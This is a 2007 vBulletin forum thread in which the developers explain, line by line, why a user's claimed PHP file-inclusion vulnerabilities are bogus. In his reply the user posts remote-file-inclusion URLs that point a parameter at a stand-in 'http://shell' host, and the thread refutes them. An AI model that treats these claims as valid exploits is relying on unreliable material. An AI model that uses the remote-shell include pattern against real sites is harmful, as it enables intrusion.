vBulletin Version 3.6.8 Vulnerabilities - Bogus

**Mike Sullivan** · Mon 6 Aug '07, 3:12am

Ok, this is just ridiculous. Searching in files for the word "include" is not a vulnerability. 2 of the lines you pointed to are COMMENTS! You know, explanation of the code!

Then you picked up a function definition, probably because it's a class method named "exec".

People love to have their name in lights... But this is just plain stupidity. It's not the first time either -- go take a look at all the people we had to "smack down" on SecurityFocus.

And on another note... responsible disclosure would mean these would be reported via the support system or in a private bug report. Please do this in the future.

**Dr.ExPoLiT** · Mon 6 Aug '07, 3:37am

ok mike
Give me an email

I am not stupid
I am GeNiUs HaCkEr
Search at Google you will Founded me hare ok mike

**Scott MacVicar** · Mon 6 Aug '07, 3:58am

Ok if you want an explanation.

includes/class_paid_subscriptions.php line 621

PHP Code:


        if (file_exists(DIR . '/includes/paymentapi/class_' . $methodinfo['classname'] . '.php'))

        {

            require_once(DIR . '/includes/paymentapi/class_' . $methodinfo['classname'] . '.php');

First its in a class so calling it directly isn't possible but even if you could $methodinfo comes directly from a database row. So please tell me where the explois is here?

--

includes/functions.php line 81

PHP Code:


    if (preg_match('#^\w+$#', $classtype))

    {

        $classtype = strtolower($classtype);

        if ($forcefile)

        {

            $classfile = preg_replace('#[^a-z0-9_]#i', '', $forcefile);

        }

        else

        {

            $classfile = str_replace('_multiple', '', $classtype);

        }

        require_once(DIR . '/includes/class_dm_' . $classfile . '.php');

Do you see that $classfile gets changed to make sure it only contains a-z0-9- that doesn't include http:// so against no exploit here even if you could force a call.

--

includes/functions_cron.php line 276

PHP Code:


        if ($nextrun = build_cron_item($nextitem['cronid'], $nextitem))

        {

            include_once(DIR . '/' . $nextitem['filename']);

        }

$nextitem is an array that comes directly from the database right above this call.

--

includes/functions_forumdisplay.php line 59

PHP Code:


// note: this function requires the use of $iconcache - include it in $specialtemplates!

This isn't even code its a comment that includes the word include.

--

includes/functions_misc.php line 519

PHP Code:


    // include the $, but escape it in the key

Again its a comment not even executed code.

--

includes/functions_ranks.php line 22

PHP Code:


// grab ranks since we didn't include 'ranks' in $specialtemplates

Another comment

--

includes/class_vurl.php line 250

PHP Code:


    function exec($followlocation = false)

    {

        // ..

    }

Thats a function definition not a PHP call so there isn't one there.

--

install/tableprefix.php line 41

PHP Code:


require_once(DIR . "/{$vbulletin->config['Misc']['admincpdir']}/global.php");

DIR is a constant you can't change that and the other is from a config file loaded directly above.

--

admincp/cronadmin.php line 110

PHP Code:


        require_once(DIR . '/includes/functions_cron.php');

        include_once(DIR . '/' . $nextitem['filename']);

$nextitem against comes from a database row directly above.

--

admincp/diagnostic.php line 368 + line 594

PHP Code:


        while ($file = readdir($handle))

        {

            if (preg_match('#^md5_sums_.+$#siU', $file, $match))

            {

                unset($md5_sum_softwareid);

                include(DIR . "/includes/$match[0]");

            }

        }

Thats a shortened version but its loadig files from the file system that match a certain pattern.

PHP Code:


            require_once(DIR . '/includes/paymentapi/class_' . $api['classname'] . '.php');

Again this is a database row loaded directly above.

--

admincp/plugin.php line 721 + line 831

PHP Code:


        $safeid = preg_replace('#[^a-z0-9_]#i', '', $product['productid']);

        if (file_exists(DIR . '/includes/version_' . $safeid . '.php'))

        {

            include_once(DIR . '/includes/version_' . $safeid . '.php');

        }

Comes from a database row bu we even validate it just to be sure, both lines you list are identical code.

--

Now as you can see thats why none of these are valid, and if you'd taken a few minutes to look at them before reporting you'd have seen that as well.

Can you even explain how a comment ended up getting shown in your results?

**Dr.ExPoLiT** · Mon 6 Aug '07, 4:31am

ok man

**Fusion** · Mon 6 Aug '07, 5:23am

Oy ve...

**Dilly** · Mon 6 Aug '07, 7:30am

Haha. Top thread. Please move it to Chit Chat.

**Dr.ExPoLiT** · Mon 6 Aug '07, 10:49am

ok Scott i tell you exploits

1st includes/class_paid_subscriptions.php line 621

PHP Code:


    if (file_exists(DIR . '/includes/paymentapi/class_' . $methodinfo['classname'] . '.php')) 
        { 
            require_once(DIR . '/includes/paymentapi/class_' . $methodinfo['classname'] . '.php');

hacker can upload shell [evil code]
from http://site/forum/includes/class_paid_subscriptions.php=http://shell?
----------
2nd
includes/functions.php line 81

PHP Code:


    if (preg_match('#^\w+$#', $classtype))
    {
        $classtype = strtolower($classtype);
        if ($forcefile)
        {
            $classfile = preg_replace('#[^a-z0-9_]#i', '', $forcefile);
        }
        else
        {
            $classfile = str_replace('_multiple', '', $classtype);
        }
        require_once(DIR . '/includes/class_dm_' . $classfile . '.php');

http://site/forum/includes/functions.php?classfile=http://shell?
---------
3nd
includes/functions_cron.php line 276

PHP Code:


         if ($nextrun = build_cron_item($nextitem['cronid'], $nextitem))
        {
            include_once(DIR . '/' . $nextitem['filename']); 
        }

http://site/forum/includes/functions_cron.php?nextrun=http://shell?
-------

Is this sufficient or not

If you side net send message and tell me what you now ok Scott MacVicar

Next time I will be gaps in SecurityFocus

good Luck.

**Colin F** · Mon 6 Aug '07, 10:53am

As Scott said above, all these variables are checked or set previously in the code.

**aranthorn** · Mon 6 Aug '07, 5:26pm

How dare anyone question Dr.ExPoLiT, he's teh 1337!

Seriously, if you think you've found an issue, the bug tracker is where it should be posted.

**Chousho** · Mon 6 Aug '07, 10:47pm

Originally posted by Dr.ExPoLiT

ok Scott i tell you exploits
...

So, you are patching your own forum when you find these exploits of course, right?

Where are you getting these php files from, because the devs patch any holes found within a day or so.

**Distance** · Mon 6 Aug '07, 10:52pm

Rofl @ this thread

**derekivey** · Mon 6 Aug '07, 10:54pm

Are you saying that DIR can be changed? That is a constant that is set in the vB code somewhere with the full path to the forum. That cannot be exploited...

**DelphiVillage** · Tue 7 Aug '07, 12:55am

Originally posted by aranthorn

How dare anyone question Dr.ExPoLiT, he's teh 1337!

I dare what he posts is just rubbisch .... Scott already explained him there are no holes still he .... and everybody not even somebody who has no idea what PHP code is knows a comment is ignored by the PHP parser.Also you don't have to be verry smart to open a PHP file and search for the word "include" and think it's a hole.... (as Mike already mentioned)

vBulletin has much work explaining all the wannabees on SecurityFocus that they are wrong i'm subscrided to that list so i know ....

**Dilly** · Tue 7 Aug '07, 1:12am

I think you missed the sarcasm.

vBulletin Version 3.6.8 Vulnerabilities - Bogus

vBulletin Version 3.6.8 Vulnerabilities - Bogus

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Related Topics